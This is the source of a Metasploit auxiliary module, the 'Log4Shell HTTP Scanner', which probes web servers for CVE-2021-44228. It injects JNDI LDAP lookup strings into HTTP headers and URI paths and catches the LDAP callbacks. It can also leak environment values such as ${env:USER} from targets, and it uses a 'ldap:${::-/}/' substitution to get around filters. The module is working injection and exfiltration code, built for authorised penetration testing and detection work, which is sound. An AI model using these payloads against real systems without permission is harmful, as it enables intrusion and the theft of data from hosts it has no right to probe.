Log4Shell HTTP Scanner

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Log4Shell
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Log4Shell HTTP Scanner',
      'Description' => %q{
        Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
        log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

        This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
        trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
        instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
        HTTP headers and the HTTP request path.

        Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid,
        Apache JSPWiki, Apache OFBiz.
      },
      'Author' => [
        'Spencer McIntyre', # The fun stuff
        'RageLtMan <rageltman[at]sempervictus>', # Some plumbing
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
        [ 'CVE', '2021-45046' ],
        [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis' ],
        [ 'URL', 'https://logging.apache.org/log4j/2.x/security.html' ]
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => []
      }
    )

    register_options([
      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
      OptString.new('LEAK_PARAMS', [ false, 'Additional parameters to leak, separated by the ^ character (e.g., ${env:USER}^${env:PATH})']),
      OptPath.new(
        'HEADERS_FILE',
        [
          false,
          'File containing headers to check',
          File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
        ]
      ),
      OptPath.new(
        'URIS_FILE',
        [
          false,
          'File containing additional URIs to check',
          File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_uris.txt')
        ]
      ),
      OptInt.new('LDAP_TIMEOUT', [ true, 'Time in seconds to wait to receive LDAP connections', 30 ])
    ])
  end

  def log4j_jndi_string(resource = '')
    resource = resource.dup
    resource << '/${java:os}/${sys:java.vendor}_${sys:java.version}'
    # We should add obfuscation to the URL string to scan through lousy "next-gen" firewalls
    unless datastore['LEAK_PARAMS'].blank?
      resource << '/'
      resource << datastore['LEAK_PARAMS']
    end
    super(resource)
  end

  #
  # Handle incoming requests via service mixin
  #
  def build_ldap_search_response(msg_id, base_dn)
    token, java_os, java_version, uri_parts = base_dn.split('/', 4)
    target_info = @mutex.synchronize { @tokens.delete(token) }
    if target_info
      @mutex.synchronize { @successes << target_info }
      details = normalize_uri(target_info[:target_uri]).to_s
      details << " (header: #{target_info[:headers].keys.first})" unless target_info[:headers].nil?
      details << " (os: #{java_os})" unless java_os.blank?
      details << " (java: #{java_version})" unless java_version.blank?
      unless uri_parts.blank?
        uri_parts = uri_parts.split('^')
        leaked = ''
        datastore['LEAK_PARAMS'].split('^').each_with_index do |input, idx|
          next if input == uri_parts[idx]

          leaked << "#{input}=#{uri_parts[idx]}  "
        end
        unless leaked.blank?
          details << " (leaked: #{leaked.rstrip})"
          vprint_good("Leaked data: #{leaked.rstrip}")
        end
      end
      peerinfo = "#{target_info[:rhost]}:#{target_info[:rport]}"
      print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")
      report_vuln(
        host: target_info[:rhost],
        port: target_info[:rport],
        info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",
        name: name,
        refs: references
      )
    end

    attrs = [ ]
    appseq = [
      base_dn.to_ber,
      attrs.to_ber_sequence
    ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
    [ msg_id.to_ber, appseq ].to_ber_sequence
  end

  def rand_text_alpha_lower_numeric(len, bad = '')
    foo = []
    foo += ('a'..'z').to_a
    foo += ('0'..'9').to_a
    Rex::Text.rand_base(len, bad, *foo)
  end

  def run
    validate_configuration!
    @mutex = Mutex.new
    @mutex.extend(::Rex::Ref)

    @tokens = {}
    @tokens.extend(::Rex::Ref)

    @successes = []
    @successes.extend(::Rex::Ref)

    begin
      start_service
    rescue Rex::BindFailed => e
      fail_with(Failure::BadConfig, e.to_s)
    end

    super

    print_status("Sleeping #{datastore['LDAP_TIMEOUT']} seconds for any last LDAP connections")
    sleep datastore['LDAP_TIMEOUT']

    if @successes.empty?
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Vulnerable(details: @successes)
  end

  def run_host(ip)
    # probe the target before continuing
    return if send_request_cgi('uri' => normalize_uri(target_uri)).nil?

    run_host_uri(ip, normalize_uri(target_uri)) unless target_uri.blank?

    return if datastore['URIS_FILE'].blank?

    File.open(datastore['URIS_FILE'], 'rb').each_line(chomp: true) do |uri|
      next if uri.blank? || uri.start_with?('#')

      if uri.include?('${jndi:uri}')
        token = rand_text_alpha_lower_numeric(8..32)
        jndi = log4j_jndi_string(token)
        uri.delete_prefix!('/')
        test(token, uri: normalize_uri(target_uri, '') + uri.gsub('${jndi:uri}', Rex::Text.uri_encode(jndi)))
      else
        run_host_uri(ip, normalize_uri(target_uri, uri))
      end
    end
  end

  def run_host_uri(_ip, uri)
    # HTTP_HEADER isn't exposed via the datastore but allows other modules to leverage this one to test a specific value
    unless datastore['HTTP_HEADER'].blank?
      token = rand_text_alpha_lower_numeric(8..32)
      test(token, uri: uri, headers: { datastore['HTTP_HEADER'] => log4j_jndi_string(token) })
    end

    unless datastore['HEADERS_FILE'].blank?
      headers_file = File.open(datastore['HEADERS_FILE'], 'rb')
      headers_file.each_line(chomp: true) do |header|
        next if header.blank? || header.start_with?('#')

        token = rand_text_alpha_lower_numeric(8..32)
        test(token, uri: uri, headers: { header => log4j_jndi_string(token) })
      end
    end

    token = rand_text_alpha_lower_numeric(8..32)
    jndi = log4j_jndi_string(token)
    test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/')), '/'))

    token = rand_text_alpha_lower_numeric(8..32)
    jndi = log4j_jndi_string(token)
    test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/'))))
  end

  def test(token, uri: nil, headers: nil)
    target_info = {
      rhost: rhost,
      rport: rport,
      target_uri: uri,
      headers: headers
    }
    @mutex.synchronize { @tokens[token] = target_info }

    send_request_raw(
      'uri' => uri,
      'method' => datastore['HTTP_METHOD'],
      'headers' => headers
    )
  end

  attr_accessor :mutex, :tokens, :successes
end